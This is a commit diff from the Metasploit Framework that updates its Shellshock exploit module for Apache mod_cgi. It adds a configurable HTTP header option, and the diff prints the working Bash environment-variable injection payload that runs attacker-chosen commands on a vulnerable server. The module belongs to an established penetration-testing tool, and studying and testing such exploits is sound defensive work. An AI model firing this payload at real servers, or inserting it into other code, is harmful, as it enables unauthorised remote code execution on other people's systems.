Land rapid7#3905 - Update exploits/multi/http/apache_mod_cgi_bash_env_exec

wchen-r7 · wchen-r7 · commit ffe5aafb2ff0 · 2014-09-29T15:19:35.000-05:00
diff --git a/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb b/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb
@@ -17,7 +17,7 @@ def initialize(info = {})
       'Description' => %q{
         This module exploits a code injection in specially crafted environment
         variables in Bash, specifically targeting Apache mod_cgi scripts through
-        the HTTP_USER_AGENT variable.
+        the HTTP_USER_AGENT variable by default.
       },
       'Author' => [
         'Stephane Chazelas', # Vulnerability discovery
@@ -58,7 +58,8 @@ def initialize(info = {})
 
     register_options([
       OptString.new('TARGETURI', [true, 'Path to CGI script']),
-      OptEnum.new('METHOD', [true, 'HTTP method to use', 'GET', ['GET', 'POST']]),
+      OptString.new('METHOD', [true, 'HTTP method to use', 'GET']),
+      OptString.new('HEADER', [true, 'HTTP header to use', 'User-Agent']),
       OptInt.new('CMD_MAX_LENGTH', [true, 'CMD max line length', 2048]),
       OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin']),
       OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 5])
@@ -117,7 +118,9 @@ def req(cmd)
       {
         'method' => datastore['METHOD'],
         'uri' => normalize_uri(target_uri.path.to_s),
-        'agent' => "() { :;};echo #{marker}$(#{cmd})#{marker}"
+        'headers' => {
+          datastore['HEADER'] => "() { :;};echo #{marker}$(#{cmd})#{marker}"
+        }
       }, datastore['TIMEOUT'])
   end
 
